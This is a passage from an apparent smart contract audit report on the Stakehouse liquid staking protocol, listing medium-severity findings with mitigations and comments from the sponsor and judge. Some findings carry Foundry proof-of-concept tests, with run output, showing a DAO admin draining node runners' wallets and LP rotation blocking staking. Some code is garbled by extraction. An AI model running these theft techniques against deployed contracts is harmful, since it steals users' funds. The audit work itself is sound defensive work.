  1. A malicious user can create and mint his own LP Token and send it to the GiantPool. Users that want to withdraw LP tokens from the GiantPool can then be tricked into withdrawing worthless attacker LP tokens, thereby burning their GiantLP tokens that are mapped 1:1 to ETH. (-> loss of funds)
  2. This can also mess up internal accounting logic. For every LP token that is owned by a GiantPool there should be a corresponding GiantLP token. Using the described behavior this ratio can be broken such that there are LP token owned by the GiantPool for which there is no GiantLP token. This means some LP token cannot be transferred from the GiantPool and there will always be some amount of LP token “stuck” in the GiantPool.

Proof of Concept

  1. The attacker deploys his own LPToken contract and sends a huge amount of LP tokens to the GiantPool to pass the check in GiantPoolBase._assertUserHasEnoughGiantLPToClaimVaultLP (
  2. The attacker tricks Bob into withdrawing the malicious LP tokens from the GiantPool (
  3. Bob’s GiantLP tokens are burnt and he receives worthless LP tokens.

The same issue exists for the GiantSavETHVaultPool.withdrawDETH function.
But in this case, the victim must also provide a wrong savETHVault address which makes this issue less likely to be exploited.

Tools Used


The GiantPool should store information about which LP tokens it receives for staking ETH.
When calling the GiantPoolBase.withdrawLPTokens function it can then be checked if the LP tokens to be withdrawn were indeed transferred to the GiantPool in exchange for staking ETH.

vince0656 (Stakehouse) confirmed

[M-07] OwnableSmartWallet: Multiple approvals can lead to unwanted ownership transfers

Submitted by aphak5010

The OwnableSmartWallet contract employs a mechanism for the owner to approve addresses that can then claim ownership ( of the contract.

The source code has a comment included which states that “Approval is revoked, in order to avoid unintended transfer allowance if this wallet ever returns to the previous owner” (

This means that when ownership is transferred from User A to User B, the approvals that User A has given should be revoked.

The existing code does not however revoke all approvals that User A has given. It only revokes one approval.

This can lead to unwanted transfers of ownership.

Proof of Concept

  1. User A approves User B and User C to claim ownership
  2. User B claims ownership first
  3. Only User A’s approval for User B is revoked, not however User A’s approval for User C
  4. User B transfers ownerhsip back to User A
  5. Now User C can claim ownership even though this time User A has not approved User C

Tools Used


You should invalidate all approvals User A has given when another User becomes the owner of the OwnableSmartWallet.

Unfortunately you cannot use a statement like delete _isTransferApproved[owner()].

So you would need an array that keeps track of approvals as pointed out in this StackExchange question:

vince0656 (Stakehouse) confirmed

[M-08] DAO admin in LiquidStakingManager.sol can rug the registered node operator by stealing their fund in the smart wallet via arbitrary execution.

Submitted by ladboy233, also found by joestakey, Trust, and chaduke

DAO admin in LiquidStakingManager.sol can rug the registered node operator by stealing their fund via arbitrary execution.

Proof of Concept

After the Liquid Staking is deployed via LSDNFactory::deployNewLiquidStakingDerivativeNetwork,

/// @notice Deploys a new LSDN and the liquid staking manger required to manage the network
/// @param _dao Address of the entity that will govern the liquid staking network
/// @param _stakehouseTicker Liquid staking derivative network ticker (between 3-5 chars)
function deployNewLiquidStakingDerivativeNetwork(
	address _dao,
	uint256 _optionalCommission,
	bool _deployOptionalHouseGatekeeper,
	string calldata _stakehouseTicker
) public returns (address) {

The DAO address governance address (contract) has very high privilege.

The DAO address can perform arbitrary execution by calling LiquidStakingManager.sol::executeAsSmartWallet

/// @notice Enable operations proxied through DAO contract to another contract
/// @param _nodeRunner Address of the node runner that created the wallet
/// @param _to Address of the target contract
/// @param _data Encoded data of the function call
/// @param _value Total value attached to the transaction
function executeAsSmartWallet(
	address _nodeRunner,
	address _to,
	bytes calldata _data,
	uint256 _value
) external payable onlyDAO {
	address smartWallet = smartWalletOfNodeRunner[_nodeRunner];
	require(smartWallet != address(0), "No wallet found");

When a register a new node operator with 4 ETH by calling registerBLSPublicKeys:

/// @notice register a node runner to LSD by creating a new smart wallet
/// @param _blsPublicKeys list of BLS public keys
/// @param _blsSignatures list of BLS signatures
/// @param _eoaRepresentative EOA representative of wallet
function registerBLSPublicKeys(
	bytes[] calldata _blsPublicKeys,
	bytes[] calldata _blsSignatures,
	address _eoaRepresentative
) external payable nonReentrant {

the smart wallet created in the smart contract custody the 4 ETH.

// create new wallet owned by liquid staking manager
smartWallet = smartWalletFactory.createWallet(address(this));
emit SmartWalletCreated(smartWallet, msg.sender);
	// transfer ETH to smart wallet
	(bool result,) ={value: msg.value}("");
	require(result, "Transfer failed");
	emit WalletCredited(smartWallet, msg.value);

but Dao admin in LiquidStakingManager.sol can rug the registered node operator by stealing their fund in the smart wallet via arbitrary execution.

As shown in POC:

first we add this smart contract in LiquidStakingManager.t.sol

import { ERC20 } from "@openzeppelin/contracts/token/ERC20/ERC20.sol";

contract RugContract {

    function receiveFund() external payable {


    receive() external payable {}

contract MockToken is ERC20 {

    constructor()ERC20("A", "B") {
        _mint(msg.sender, 10000 ether);


We add the two POC,

the first POC shows the admin can steal the ETH from the smart contract via arbrary execution.

    function testDaoRugFund_Pull_ETH_POC() public {
        address user = vm.addr(21312);

        bytes[] memory publicKeys = new bytes[](1);
        publicKeys[0] = "publicKeys";

        bytes[] memory signature = new bytes[](1);
        signature[0] = "signature";

        RugContract rug = new RugContract();

        // user spends 4 ehter and register the key to become the public operator
        vm.prank(user);, 4 ether);
        manager.registerBLSPublicKeys{value: 4 ether}(
        address wallet = manager.smartWalletOfNodeRunner(user);
        console.log("wallet ETH balance for user after registering");

        // dao admin rug the user by withdraw the ETH via arbitrary execution.
        bytes memory data = abi.encodeWithSelector(RugContract.receiveFund.selector, "");
            4 ether
        console.log("wallet ETH balance for user after DAO admin rugging");


We run the test:

forge test -vv --match testDaoRugFund_Pull_ETH_POC

the result is

Running 1 test for test/foundry/LiquidStakingManager.t.sol:LiquidStakingManagerTests
[PASS] testDaoRugFund_Pull_ETH_POC() (gas: 353826)
  wallet ETH balance for user after registering
  wallet ETH balance for user after DAO admin rugging

Test result: ok. 1 passed; 0 failed; finished in 13.63ms

the second POC shows the admin can steal the ERC20 token from the smart contract via arbrary execution.

    function testDaoRugFund_Pull_ERC20_Token_POC() public {

        address user = vm.addr(21312);

        bytes[] memory publicKeys = new bytes[](1);
        publicKeys[0] = "publicKeys";

        bytes[] memory signature = new bytes[](1);
        signature[0] = "signature";

        RugContract rug = new RugContract();

        vm.prank(user);, 4 ether);
        manager.registerBLSPublicKeys{value: 4 ether}(

        address wallet = manager.smartWalletOfNodeRunner(user);
        ERC20 token = new MockToken();
        token.transfer(wallet, 100 ether);

        console.log("wallet ERC20 token balance for user after registering");

        bytes memory data = abi.encodeWithSelector(IERC20.transfer.selector, address(rug), 100 ether);

        console.log("wallet ERC20 token balance for dao rugging");


We run the test:

forge test -vv --match testDaoRugFund_Pull_ERC20_Token_POC

the running result is

Running 1 test for test/foundry/LiquidStakingManager.t.sol:LiquidStakingManagerTests
[PASS] testDaoRugFund_Pull_ERC20_Token_POC() (gas: 940775)
  wallet ERC20 token balance for user after registering
  wallet ERC20 token balance for dao rugging

Test result: ok. 1 passed; 0 failed; finished in 16.99ms

Tools Used

Manual Review, Foundry

We recommend not give the dao admin the priviledge to perform arbitrary execution to access user’s fund.

vince0656 (Stakehouse) confirmed

[M-09] DAO or lsdn owner can steal funds from node runner

Submitted by koxuan

DAO or LSD network owner can swap node runner of the smart contract to their own eoa, allowing them to withdrawETH or claim rewards from node runner.

Proof of Concept

There are no checks done when swapping the node runner whether there are funds in the smart contract that belongs to the node runner. Therefore, a malicious dao or lsd network owner can simply swap them out just right after the node runner has deposited 4 ether in the smart wallet.

Place poc in LiquidStakingManager.sol

    function testDaoCanTakeNodeRunner4ETH() public {
        address nodeRunner = accountOne;, 4 ether);
        address feesAndMevUser = accountTwo;, 4 ether);
        address savETHUser = accountThree;, 24 ether);
        address attacker = accountFour;

        registerSingleBLSPubKey(nodeRunner, blsPubKeyOne, accountFour);

        manager.rotateNodeRunnerOfSmartWallet(nodeRunner, attacker, true);


        emit log_uint(attacker.balance);
        emit log_uint(attacker.balance);

Tools Used


Send back outstanding ETH and rewards that belongs to node runner if swapping is needed.

vince0656 (Stakehouse) confirmed

[M-10] Incorrect implementation of the ETHPoolLPFactory.sol#rotateLPTokens let user stakes ETH more than maxStakingAmountPerValidator in StakingFundsVault, and DOS the stake function in LiquidStakingManager

Submitted by ladboy233, also found by immeas, 0xdeadbeef0x, bin2chen, minhtrng, and SaeedAlipoor01988

The user is not able to stake the 32 ETH for validators because the staking fund vault LP total supply exceeds 4 ETHER.

After the smart wallet, staking fund vault and savETH vault has 32 ETH, the user should be able to call:

/// @notice Anyone can call this to trigger staking once they have all of the required input params from BLS authentication
/// @param _blsPublicKeyOfKnots List of knots being staked with the Ethereum deposit contract (32 ETH sourced within the network)
/// @param _ciphertexts List of backed up validator operations encrypted and stored to the Ethereum blockchain
/// @param _aesEncryptorKeys List of public identifiers of credentials that performed the trustless backup
/// @param _encryptionSignatures List of EIP712 signatures attesting to the correctness of the BLS signature
/// @param _dataRoots List of serialized SSZ containers of the DepositData message for each validator used by Ethereum deposit contract
function stake(
	bytes[] calldata _blsPublicKeyOfKnots,
	bytes[] calldata _ciphertexts,
	bytes[] calldata _aesEncryptorKeys,
	IDataStructures.EIP712Signature[] calldata _encryptionSignatures,
	bytes32[] calldata _dataRoots
) external {

before the staking, the validation function is called:

// check minimum balance of smart wallet, dao staking fund vault and savETH vault

which calls:

/// @dev Check the savETH vault, staking funds vault and node runner smart wallet to ensure 32 ether required for staking has been achieved
function _assertEtherIsReadyForValidatorStaking(bytes calldata blsPubKey) internal view {
	address associatedSmartWallet = smartWalletOfKnot[blsPubKey];
	require(associatedSmartWallet.balance >= 4 ether, "Smart wallet balance must be at least 4 ether");

	LPToken stakingFundsLP = stakingFundsVault.lpTokenForKnot(blsPubKey);
	require(address(stakingFundsLP) != address(0), "No funds staked in staking funds vault");
	require(stakingFundsLP.totalSupply() == 4 ether, "DAO staking funds vault balance must be at least 4 ether");

	LPToken savETHVaultLP = savETHVault.lpTokenForKnot(blsPubKey);
	require(address(savETHVaultLP) != address(0), "No funds staked in savETH vault");
	require(savETHVaultLP.totalSupply() == 24 ether, "KNOT must have 24 ETH in savETH vault");

note that the code requires the total supply of the stakingFundsLP to be equal to 4 ETHER

require(stakingFundsLP.totalSupply() == 4 ether, "DAO staking funds vault balance must be at least 4 ether");

however, user can call the function rotateLPTokens to mint more than 4 ETHER of the stakingFundsLP because of the incorrect implementation of the ETHPoolLPFactory.sol#rotateLPTokens

note that stakingFundVault inherits from ETHPoolFactory.sol

contract StakingFundsVault is
    Initializable, ITransferHookProcessor, StakehouseAPI, ETHPoolLPFactory,

so user call rotateLPTokens on StakingFundsVault

/// @notice Allow users to rotate the ETH from one LP token to another in the event that the BLS key is never staked
/// @param _oldLPToken Instance of the old LP token (to be burnt)
/// @param _newLPToken Instane of the new LP token (to be minted)
/// @param _amount Amount of LP tokens to be rotated/converted from old to new
function rotateLPTokens(LPToken _oldLPToken, LPToken _newLPToken, uint256 _amount) public {
	require(address(_oldLPToken) != address(0), "Zero address");
	require(address(_newLPToken) != address(0), "Zero address");
	require(_oldLPToken != _newLPToken, "Incorrect rotation to same token");
	require(_amount >= MIN_STAKING_AMOUNT, "Amount cannot be zero");
	require(_amount <= _oldLPToken.balanceOf(msg.sender), "Not enough balance");
	require(_oldLPToken.lastInteractedTimestamp(msg.sender) + 30 minutes < block.timestamp, "Liquidity is still fresh");
	require(_amount + _newLPToken.totalSupply() <= 24 ether, "Not enough mintable tokens");

note the line:

require(_amount + _newLPToken.totalSupply() <= 24 ether, "Not enough mintable tokens");

the correct implementaton should be:

require(_amount + _newLPToken.totalSupply() <= maxStakingAmountPerValidator, "Not enough mintable tokens");

The 24 ETH is hardcoded, but when the stakingFundsVault.sol is init, the maxStakingAmountPerValidator is set to 4 ETH.

/// @dev Initialization logic
function _init(LiquidStakingManager _liquidStakingNetworkManager, LPTokenFactory _lpTokenFactory) internal virtual {
	require(address(_liquidStakingNetworkManager) != address(0), "Zero Address");
	require(address(_lpTokenFactory) != address(0), "Zero Address");

	liquidStakingNetworkManager = _liquidStakingNetworkManager;
	lpTokenFactory = _lpTokenFactory;

	baseLPTokenName = "ETHLPToken_";
	baseLPTokenSymbol = "ETHLP_";
	maxStakingAmountPerValidator = 4 ether;

note the line:

maxStakingAmountPerValidator = 4 ether;

this parameter maxStakingAmountPerValidator restrict user’s ETH deposit amount

    /// @dev Internal business logic for processing staking deposits for single or batch deposits
function _depositETHForStaking(bytes calldata _blsPublicKeyOfKnot, uint256 _amount, bool _enableTransferHook) internal {
	require(_amount >= MIN_STAKING_AMOUNT, "Min amount not reached");
	require(_blsPublicKeyOfKnot.length == 48, "Invalid BLS public key");

	// LP token issued for the KNOT
	// will be zero for a new KNOT because the mapping doesn't exist
	LPToken lpToken = lpTokenForKnot[_blsPublicKeyOfKnot];
	if(address(lpToken) != address(0)) {
		// KNOT and it's LP token is already registered
		// mint the respective LP tokens for the user

		// total supply after minting the LP token must not exceed maximum staking amount per validator
		require(lpToken.totalSupply() + _amount <= maxStakingAmountPerValidator, "Amount exceeds the staking limit for the validator");

		// mint LP tokens for the depoistor with 1:1 ratio of LP tokens and ETH supplied, _amount);
		emit LPTokenMinted(_blsPublicKeyOfKnot, address(lpToken), msg.sender, _amount);
	else {
		// check that amount doesn't exceed max staking amount per validator
		require(_amount <= maxStakingAmountPerValidator, "Amount exceeds the staking limit for the validator");  

note the line:

require(_amount <= maxStakingAmountPerValidator, "Amount exceeds the staking limit for the validator"); 

However, such restriction when rotating LP is changed to

require(_amount + _newLPToken.totalSupply() <= 24 ether, "Not enough mintable tokens");

So to sum it up:

When user stakes, the code strictly requires the stakingFundVault LP total supply is equal to 4 ETH:

require(stakingFundsLP.totalSupply() == 4 ether, "DAO staking funds vault balance must be at least 4 ether");

However, when rotating the LP, the maxStakingAmountPerValidator for staking fund LP becomes 24 ETH, which exceeds 4 ETH (the expected maxStakingAmountPerValidator)

Proof of Concept

First we need to add the import in LiquidStakingManager.t.sol

import { MockAccountManager } from "../../contracts/testing/stakehouse/MockAccountManager.sol";

import "../../contracts/liquid-staking/StakingFundsVault.sol";
import "../../contracts/liquid-staking/LPToken.sol";

then we add the POC:

function test_rotateLP_Exceed_maxStakingAmountPerValidator_POC() public {

	address user = vm.addr(21312);

	bytes memory blsPubKeyOne = fromHex("94fdc9a61a34eb6a034e343f20732456443a2ed6668ede04677adc1e15d2a24500a3e05cf7ad3dc3b2f3cc13fdc12af5");
	bytes memory blsPubKeyTwo = fromHex("9AAdc9a61a34eb6a034e343f20732456443a2ed6668ede04677adc1e15d2a24500a3e05cf7ad3dc3b2f3cc13fdc12af5");

	bytes[] memory publicKeys = new bytes[](2);
	publicKeys[0] = blsPubKeyOne;
	publicKeys[1] = blsPubKeyTwo;

	bytes[] memory signature = new bytes[](2);
	signature[0] = "signature";
	signature[1] = "signature";

	// user spends 8 ether and register two keys to become the public operator
	vm.prank(user);, 8 ether);
	manager.registerBLSPublicKeys{value: 8 ether}(

	// active two keys
	MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyOne, 1);
	MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyTwo, 1);

	// deposit 4 ETH for public key one and public key two
	StakingFundsVault stakingFundsVault = manager.stakingFundsVault();
	stakingFundsVault.depositETHForStaking{value: 4 ether}(blsPubKeyOne, 4 ether);
	stakingFundsVault.depositETHForStaking{value: 4 ether}(blsPubKeyTwo, 4 ether);

	// to bypass the error: "Liquidity is still fresh"
	vm.warp(1 days);

	// rotate staking amount from public key one to public key two
	// LP total supply for public key two exceed 4 ETHER
	LPToken LPTokenForPubKeyOne = manager.stakingFundsVault().lpTokenForKnot(blsPubKeyOne);
	LPToken LPTokenForPubKeyTwo = manager.stakingFundsVault().lpTokenForKnot(blsPubKeyTwo);
	stakingFundsVault.rotateLPTokens(LPTokenForPubKeyOne, LPTokenForPubKeyTwo, 4 ether);

	uint256 totalSupply = LPTokenForPubKeyTwo.totalSupply();
	console.log("total supply of the Staking fund LP exists 4 ETHER.");

	// calling TestUtils.sol#stakeSingleBlsPubKey, revert


We run the POC:

forge test -vv --match test_rotateLP_Exceed_maxStakingAmountPerValidator_POC

the output is:

Running 1 test for test/foundry/LiquidStakingManager.t.sol:LiquidStakingManagerTests
[FAIL. Reason: DAO staking funds vault balance must be at least 4 ether] test_rotateLP_Exceed_maxStakingAmountPerValidator_POC() (gas: 1510454)
  total supply of the Staking fund LP exists 4 ETHER.

Test result: FAILED. 0 passed; 1 failed; finished in 15.73ms

Failing tests:
Encountered 1 failing test in test/foundry/LiquidStakingManager.t.sol:LiquidStakingManagerTests
[FAIL. Reason: DAO staking funds vault balance must be at least 4 ether] test_rotateLP_Exceed_maxStakingAmountPerValidator_POC() (gas: 1510454)

the total supply of the LP exceeds 4 ETH and the transaction precisely reverts in:

require(stakingFundsLP.totalSupply() == 4 ether, "DAO staking funds vault balance must be at least 4 ether");

Tools Used

Manual Review, Foundry

We recommend the project change from

require(_amount + _newLPToken.totalSupply() <= 24 ether, "Not enough mintable tokens");


require(_amount + _newLPToken.totalSupply() <= maxStakingAmountPerValidator, "Not enough mintable tokens");

and change from

/// @dev Check the savETH vault, staking funds vault and node runner smart wallet to ensure 32 ether required for staking has been achieved
function _assertEtherIsReadyForValidatorStaking(bytes calldata blsPubKey) internal view {
	address associatedSmartWallet = smartWalletOfKnot[blsPubKey];
	require(associatedSmartWallet.balance >= 4 ether, "Smart wallet balance must be at least 4 ether");

	LPToken stakingFundsLP = stakingFundsVault.lpTokenForKnot(blsPubKey);
	require(address(stakingFundsLP) != address(0), "No funds staked in staking funds vault");
	require(stakingFundsLP.totalSupply() >= 4 ether, "DAO staking funds vault balance must be at least 4 ether");

	LPToken savETHVaultLP = savETHVault.lpTokenForKnot(blsPubKey);
	require(address(savETHVaultLP) != address(0), "No funds staked in savETH vault");
	require(savETHVaultLP.totalSupply() >= 24 ether, "KNOT must have 24 ETH in savETH vault");

we change from == balance check to >=, because == balance check is too strict in this case.

vince0656 (Stakehouse) confirmed

Trust (warden) commented:

Really nice find and described beautifully. The only thing I would ask is why it is considered a HIGH risk, if the described impact is DOS of the staking function, which is a Medium level impact.

LSDan (judge) decreased severity to Medium and commented:

I agree with the sponsor and other wardens here. This should be medium. Great find and explanation.

[M-11] Banned BLS public keys can still be registered

Submitted by Lambda, also found by bearonbike

In registerBLSPublicKeys, it should be checked (according to the comment and error) if a BLS public key is part of the LSD network and not banned:

// check if the BLS public key is part of LSD network and is not banned
require(isBLSPublicKeyPartOfLSDNetwork(_blsPublicKey) == false, "BLS public key is banned or not a part of LSD network");

However, this is not actually checked. The function isBLSPublicKeyPartOfLSDNetwork only checks if the public key is part of the LSD network:

function isBLSPublicKeyPartOfLSDNetwork(bytes calldata _blsPublicKeyOfKnot) public virtual view returns (bool) {
        return smartWalletOfKnot[_blsPublicKeyOfKnot] != address(0);

The function isBLSPublicKeyBanned would perform both checks and should be called here:

function isBLSPublicKeyBanned(bytes calldata _blsPublicKeyOfKnot) public virtual view returns (bool) {
        return !isBLSPublicKeyPartOfLSDNetwork(_blsPublicKeyOfKnot) || bannedBLSPublicKeys[_blsPublicKeyOfKnot] != address(0);

Because of that, it is possible to pass banned BLS public keys to registerBLSPublicKeys and the call will succeed.

Use isBLSPublicKeyBanned instead of isBLSPublicKeyPartOfLSDNetwork.

vince0656 (Stakehouse) confirmed

[M-12] Attacker can grift syndicate staking by staking a small amount

Submitted by Lambda

LiquidStakingManager._autoStakeWithSyndicate always stakes a fixed amount of 12 ETH. However, Syndicate.stake only allows a total staking amount of 12 ETH and reverts otherwise:

if (_sETHAmount + totalStaked > 12 ether) revert InvalidStakeAmount();

An attacker can abuse this and front-run calls to mintDerivatives (which call _autoStakeWithSyndicate internally). Because Syndicate.stake can be called by everyone, he can stake the minimum amount (1 gwei) such that the mintDerivatives call fails.

Proof Of Concept

As soon as there is a mintDerivatives call in the mempool, an attacker (that owns sETH) calls Syndicate.stake with an amount of 1 gwei. _autoStakeWithSyndicate will still call Syndicate.stake with 12 ether. However, _sETHAmount + totalStaked > 12 ether will then be true, meaning that the call will revert.

Only allow staking through the LiquidStakingManager, i.e. add access control to Syndicate.stake.

vince0656 (Stakehouse) confirmed

[M-13] GiantPool batchRotateLPTokens function: Minimum balance for rotating LP Tokens should by dynamically calculated

Submitted by aphak5010

The GiantSavETHVaultPool and GiantMevAndFeesPool both have a batchRotateLPTokens function that allows to move staked ETH to another key. Both functions require that the GiantLP balance of the sender is >=0.5 ether.

The reason for this is that there is a common interest needed in order to rotate LP Tokens. The way this is implemented right now does not serve this purpose and even makes the functions unable to be called in some cases.

The MIN_STAKING_AMOUNT for the GiantPools is 0.001 ether ( So a user should expect that this amount is sufficient to properly use the contract. However, even if there are multiple users paying into the GiantPool, they might not reach the 0.5 ETH threshold to call the function. So even if they would use some kind of multisig wallet to call the batchRotateLPTokens function, it would not be possible.

Also the threshold does not scale.

Imagine that User A puts 100 ETH into the GiantPool. Another User B puts 0.5 ETH into the GiantPool. Can we speak of “common interest” when User B wants to rotate the LP Tokens?

Tools Used


My suggestion is to use a formula like:
require(lpTokenETH.balanceOf(msg.sender) >= (lpTokenETH.totalSupply() / CONSTANT_VALUE)).
Where you can choose a CONSTANT_VALUE like 20 or 50.

This properly scales the required amount and helps mitigate both scenarios.

vince0656 (Stakehouse) confirmed

[M-14] Cross-chain replay attacks are possible with deployLPToken

Submitted by 0xSmartContract

Mistakes made on one chain can be re-applied to a new chain. There is no in the data.

If a user does deployLPToken using the wrong network, an attacker can replay the action on the correct chain, and steal the funds a-la the wintermute gnosis safe attack, where the attacker can create the same address that the user tried to, and steal the funds from there

Proof of Concept

  26      /// @param _tokenName Name of the LP token to be deployed
  27:     function deployLPToken(
  28:         address _deployer,
  29:         address _transferHookProcessor,
  30:         string calldata _tokenSymbol,
  31:         string calldata _tokenName
  32:     ) external returns (address) {
  33:         require(address(_deployer) != address(0), "Zero address");
  34:         require(bytes(_tokenSymbol).length != 0, "Symbol cannot be zero");
  35:         require(bytes(_tokenName).length != 0, "Name cannot be zero");
  37:         address newInstance = Clones.clone(lpTokenImplementation);
  38:         ILPTokenInit(newInstance).init(
  39:             _deployer,
  40:             _transferHookProcessor,
  41:             _tokenSymbol,
  42:             _tokenName
  43:         );
  45:         emit LPTokenDeployed(newInstance);
  47:         return newInstance;
  48:     }

Include the

vince0656 (Stakehouse) disputed and commented:

LSD is a protocol deployed on ETH only.

LSDan (judge) commented:

Understood, but ETH can and has forked. It is also possible that you or a team that succeeds you changes your mind about multiple network deployments.

[M-15] GiantMevAndFeesPool.previewAccumulatedETH function: “accumulated” variable is not updated correctly in for loop leading to result that is too low

Submitted by aphak5010, also found by datapunk, Trust, Aymen0909, and zaskoh

The GiantMevAndFeesPool.previewAccumulatedETH function ( allows to view the ETH that is accumulated by an address.

However the formula is not correct.

In each iteration of the foor loop, accumulated is assigned a new value ( when actually the value should be updated like this:

accumulated += StakingFundsVault(payable(_stakingFundsVaults[i])).batchPreviewAccumulatedETH(

Obviously the accumulated value must be calculated for all stakingFundVaults not only for one stakingFundsVault.

While this calculation is not used internally by the contract, it will cause any third-party contract that relies on this calculation to behave incorrectly.

For example a third party smart contract might only allow users to withdraw once the value returned by previewAccumulatedETH reaches a certain threshold. Because of the issue however the accumulated ETH value that is returned will always be too low.

Tools Used



@@ -88,7 +88,7 @@ contract GiantMevAndFeesPool is ITransferHookProcessor, GiantPoolBase, Syndicate
         uint256 accumulated;
         for (uint256 i; i < _stakingFundsVaults.length; ++i) {
-            accumulated = StakingFundsVault(payable(_stakingFundsVaults[i])).batchPreviewAccumulatedETH(
+            accumulated += StakingFundsVault(payable(_stakingFundsVaults[i])).batchPreviewAccumulatedETH(

vince0656 (Stakehouse) confirmed

[M-16] dETH / ETH / LPTokenETH can become depegged due to ETH 2.0 reward slashing

Submitted by ladboy233, also found by Trust

I want to quote the info from the doc:

SavETH Vault - users can pool up to 24 ETH where protected staking ensures no-loss. dETH can be redeemed after staking


Allocate savETH <> dETH to savETH Vault (24 dETH)

However, the main risk in ETH 2.0 POS staking is the slashing penalty, in that case the ETH will not be pegged and the validator cannot maintain a minimum 32 ETH staking balance.

We recommand the protocol to add mechanism to ensure the dETH is pegged via burning if case the ETH got slashed.

And consider when the node do not maintain a minmum 32 ETH staking balance, who is in charge of adding the ETH balance to increase the staking balance or withdraw the ETH and distribute the fund.

Please note: the following comment occurred after judging and awarding were finalized.

vince0656 (Stakehouse) disputed and commented:

There is no peg associated with dETH. Users can redeem underlying staked ETH by rage quitting Stakehouse protocol. This is taken care of by the Stakehouse protocol through SLOT (which protects) dETH due to redemption rate mechanics and further special exit penalty. Please see audit reports for Stakehouse:
Audit report 1:
Audit report 2:

[M-17] Address.isContract() is not a reliable way of checking if the input is an EOA

Submitted by yixxas, also found by CloudX and ladboy233

The underlying assumption of eoaRepresentative being an EOA can be untrue. This can cause many unintended effects as the contract comments strongly suggests that this must be an EOA account.

Proof of Concept

When BLS public key is registered in registerBLSPublicKeys(), it has the check of

require(!Address.isContract(_eoaRepresentative), "Only EOA representative permitted")

However, this check can be passed even though input is a smart contract if

  1. Function is called in the constructor. Address.isContract() checks for the code length, but during construction code length is 0.
  2. Smart contract that has not been deployed yet can be used. The CREATE2 opcode can be used to deterministically calculate the address of a smart contract before it is created. This means that the user can bypass this check by calling this function before deploying the contract.

It is generally not recommended to enforce an address to be only EOA and AFAIK, this is impossible to enforce due to the aforementioned cases. I recommend the protocol team to take a closer look at this and build the protocol with the assumption that _eoaRepresentative == EOA.

vince0656 (Stakehouse) disputed and commented:

Using tx.origin is generally frowned upon.

LSDan (judge) commented:

The sponsor confirming that they know it’s an issue does not invalidate it as an issue.

[M-18] Node runners can lose all their stake rewards due to how the DAO commissions can be set to a 100%

Submitted by yixxas, also found by joestakey, sahar, pashov, and cccz

Node runners can have all their stake rewards taken by the DAO as commissions can be set to a 100%.

Proof of Concept

There is no limits on _updateDAORevenueCommission() except not exceeding MODULO, which means it can be set to a 100%.


    function _updateDAORevenueCommission(uint256 _commissionPercentage) internal {
        require(_commissionPercentage <= MODULO, "Invalid commission");

        emit DAOCommissionUpdated(daoCommissionPercentage, _commissionPercentage);

        daoCommissionPercentage = _commissionPercentage;

This percentage is used to calculate uint256 daoAmount = (_received * daoCommissionPercentage) / MODULO in _calculateCommission().
Remaining is then calculated with uint256 rest = _received - daoAmount, and in this case rest = 0.
When node runner calls claimRewardsAsNodeRunner(), the node runner will receive 0 rewards.

There should be maximum cap on how much commission DAO can take from node runners.

vince0656 (Stakehouse) disputed and commented:

Node runners can see ahead of time what the % commission is and therefore, they can make a decision based on that. However, on reflection, a maximum amount is not a bad idea.

LSDan (judge) commented:

I will leave this in place as I think it’s a valid concern. If the DAO is compromised (specifically included in scope), the impact is felt immediately and applies to all unclaimed rewards. The node runners can’t necessarily see a high fee rate coming in advance.

[M-19] When users transfer GiantLP, some rewards may be lost

Submitted by cccz

GiantMevAndFeesPool.beforeTokenTransfer will try to distribute the user’s current rewards to the user when transferring GaintLP, but since beforeTokenTransfer will not call StakingFundsVault.claimRewards to claim the latest rewards, thus making the calculated accumulatedETHPerLPShare smaller and causing the user to lose some rewards.

Proof of Concept

Consider claiming the latest rewards from StakingFundsVault before the GiantMevAndFeesPool.beforeTokenTransfer calls updateAccumulatedETHPerLP()

vince0656 (Stakehouse) acknowledged and commented:

So the nuance here is that due to contract limitations, users should be encouraged for this specific case to claim rewards before transferring tokens due to the requirement of claim params that the contract wouldn’t readily have when executing a transfer. We can document this limitation in detail and encourage users to always claim before transferring the tokens.

LSDan (judge) commented:

I think medium is appropriate for this issue given that we have a loss of funds if the user performs actions out of order.

[M-20] smartWallet address is not guaranteed correct. ETH may be lost

Submitted by gz627, also found by datapunk

Liquid staking manager call function withdrawETHForStaking(address _smartWallet, uint256 _amount) to withdraw ETH for staking. It’s manager’s responsibility to set the correct _smartWallet address. However, there is no way to guarantee this. If a typo (or any other reasons) leads to a non-zero non-existent _smartWallet address, this function won’t be able to detect the problem, and the ETH transfer statement will always return true. This will result in the ETH permanently locked to a non-existent account.

Proof of Concept

Liquid staking manager call function withdrawETHForStaking(address _smartWallet, uint256 _amount) with a non-zero non-existent _smartWallet address and some _amount of ETH. Function call will succeed but the ETH will be locked to the non-existent _smartWallet address.

The problem can be solved if we can verify the _smartWallet is a valid existent smartWallet before ETH transfer. The easiest solution is to verify the smartWallet has a valid owner since the smart wallet we are using is ownable. So, just add the checking owner code before ETH transfer.

vince0656 (Stakehouse) confirmed

LSDan (judge) commented:

As with #308, I recommend that the sponsor review all of the duplicates of this issue.

[M-21] EIP1559 rewards received by syndicate during the period when it has no registered knots can be lost

Submitted by rbserver

When the deRegisterKnotFromSyndicate function is called by the DAO, the _deRegisterKnot function is eventually called to execute numberOfRegisteredKnots -= 1. It is possible that numberOfRegisteredKnots is reduced to 0. During the period when the syndicate has no registered knots, the EIP1559 rewards that are received by the syndicate remain in the syndicate since functions like updateAccruedETHPerShares do not include any logics for handling such rewards received by the syndicate. Later, when a new knot is registered and mints the derivatives, the node runner can call the claimRewardsAsNodeRunner function to receive half ot these rewards received by the syndicate during the period when it has no registered knots. Yet, because such rewards are received by the syndicate before the new knot mints the derivatives, the node runner should not be entitled to these rewards. Moreover, due to the issue mentioned in my other finding titled “Staking Funds vault’s LP holder cannot claim EIP1559 rewards after derivatives are minted for a new BLS public key that is not the first BLS public key registered for syndicate”, calling the StakingFundsVault.claimRewards function by the Staking Funds vault’s LP holder reverts so the other half of such rewards is locked in the syndicate. Even if calling the StakingFundsVault.claimRewards function by the Staking Funds vault’s LP holder does not revert, the Staking Funds vault’s LP holder does not deserve the other half of such rewards because these rewards are received by the syndicate before the new knot mints the derivatives. Because these EIP1559 rewards received by the syndicate during the period when it has no registered knots can be unfairly sent to the node runner or remain locked in the syndicate, such rewards are lost.

    function deRegisterKnotFromSyndicate(bytes[] calldata _blsPublicKeys) external onlyDAO {

    function deRegisterKnots(bytes[] calldata _blsPublicKeys) external onlyOwner {

